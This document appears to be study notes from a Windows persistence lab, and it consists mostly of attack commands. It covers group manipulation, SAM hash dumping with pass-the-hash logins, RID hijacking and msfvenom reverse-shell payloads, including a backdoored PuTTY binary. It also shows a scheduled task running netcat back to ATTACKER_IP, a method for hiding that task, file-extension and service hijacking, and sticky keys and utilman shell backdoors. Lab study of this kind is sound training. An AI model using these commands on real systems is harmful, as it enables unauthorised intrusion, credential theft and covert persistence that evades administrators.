# Add to admin
net localgroup administrators oscar42 /add
# Add to backup operators. Can read/write any mem location or reg
net localgroup "Backup Operators" oscar42 /add
# Allow RDP for backup operators
net localgroup "Remote Management Users" oscar42 /add
# Disable LocalAccountTokenFilterPolicy to allow use of remote admin
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
Conn to group using Evil-WinRM
# Connect to box
evil-winrm -i 10.10.0.1 -u oscar42 -p Password321
# Check Groups
whoami /groups
# Download for secrets dump
reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bak
# Dump hashes using Impacket
python3.9 /opt/impacket/examples/secretsdump.py -sam sam.bak -system system.bak LOCAL
# Login using admin hash (last part of hashdump)
evil-winrm -i 10.10.0.1 -u Administrator -H 1cea1d7e8899f69e89088c4cb4bbdaa3
Special Privileges and Security Descriptors
Name
Description
SeBackupPrivilege
The user can read any file in the system, ignoring any DACL in place.
SeRestorePrivilege
The user can write any file in the system, ignoring any DACL in place.
# Export current config
secedit /export /cfg config.inf
# Add user to lines in config
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551,oscar42
SeRestorePrivilege = *S-1-5-32-544,*S-1-5-32-551,oscar42
# Convert modified file to DB and load it to sys
secedit /import /cfg config.inf /db config.sdb
secedit /configure /db config.sdb /cfg config.inf
# To allow RDP, Open GUI, Add oscar42 user, Allow Full controll permission
Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI
# You can now connect to Winrm
evil-winrm -i 10.10.0.1 -u oscar42 -p Password321
Relative ID (RID) Hijacking
# List RIDs of all users
wmic useraccount get name,sid
>> wmic useraccount get name,sid
Name SID
Administrator S-1-5-21-1966530601-3185510712-10604624-500
DefaultAccount S-1-5-21-1966530601-3185510712-10604624-503
Guest S-1-5-21-1966530601-3185510712-10604624-501
oscar42 S-1-5-21-1966530601-3185510712-10604624-1010
WDAGUtilityAccount S-1-5-21-1966530601-3185510712-10604624-504
The important bit is the 1010 at the end of the SID for the user oscar42. This is the RID, and we need to change it to the same value as the administrator, 500.
# open regedit as System using PSEXEC
PsExec64.exe -i -s regedit
Now we need to modify the HKLM\SAM\SAM\Domains\Account\Users\ key for the user we want to elevate. Convert the RID to HEX to find the user. In this case, 1010 converts to 0x3f2.
Modify the F key to have the admins bytes, 0x1f4 with the byte order reversed.
Backdooring Files
Using MSFVenom
# Add a backdoor to Putty that executes a payload on run
msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=ATTACKER_IP lport=4444 -b "\x00" -f exe -o puttyX.exe
Hijacking File Extensions
File extensions are located at HKLM\Software\Classes\. We can then select a extension. Selecting the .txt extension reveals a link to the class txtfile. We can then change the command ran when opening this file type at Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command
we can then save this script to c:\Windows\system32\backdoor.ps1, and change the reg key to powershell -windowstyle hidden C:\windows\system32\backdoor2.ps1 %1. Opening any .txt file will now execute our payload.
Services
Auto change admin pass
This will create a service that changes the admin password to passwd123 on startup.
sc.exe create THMservice binPath= "net user Administrator Passwd123" start= auto
sc.exe start THMservice
MSFVenom
On the attackers machine:
# Creates a malicious service
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4448 -f exe-service -o rev-svc.exe
On the target machine:
# After dropping the exe into C:\Windows\
sc.exe create malService binPath= "C:\windows\rev-svc.exe" start= auto
sc.exe start malService
Service hijacking
# List all services. We want to look for a stopped service to avoid
# detection from a AV monitoring services
sc.exe query state=all
# Query for information on a discovered service
sc.exe qc service1
# Change binary path for service
sc.exe config service1 binPath= "C:\Windows\rev-svc2.exe" start= auto obj= "LocalSystem"
# now you can either wait for the service to start itself, or start it manually with
sc.exe start service1
Task Scheduler
# Create a task to establish a connection every min
schtasks /create /sc minute /mo 1 /tn TaskBackdoor /tr "c:\tools\nc64 -e cmd.exe ATTACKER_IP 4449" /ru SYSTEM
# Check if task was created
schtasks /query /tn taskbackdoor
Hide task
A task can be hidden by deleting its service descriptor (SD). Service descriptors can be viewed at HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\. Next, select the service you created and delete the SD record for it.
Logon Triggered Persistence
Startup Folder
# Programs stored in
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\
# Will be ran on startup
Registry
# Create a REG_EXPAND_SZ in the registry path with a link to the application
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
# Add a link to the exe after the comma in UserInit
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\
# Add a key called "UserInitMprLogonScript" with a path to the exe
HKCU\Environment
Logon Screen
Stickeykeys
takeown /f c:\Windows\System32\sethc.exe
icacls C:\Windows\System32\sethc.exe /grant Administrator:F
copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
# Shift 5 times at lockscreen will now pop a shell
Utilman
takeown /f c:\Windows\System32\Utilman.exe
icacls C:\Windows\System32\Utilman.exe /grant Administrator:F
copy c:\Windows\System32\cmd.exe C:\Windows\System32\Utilman.exe
# Pressing the accessability settings will now pop a shell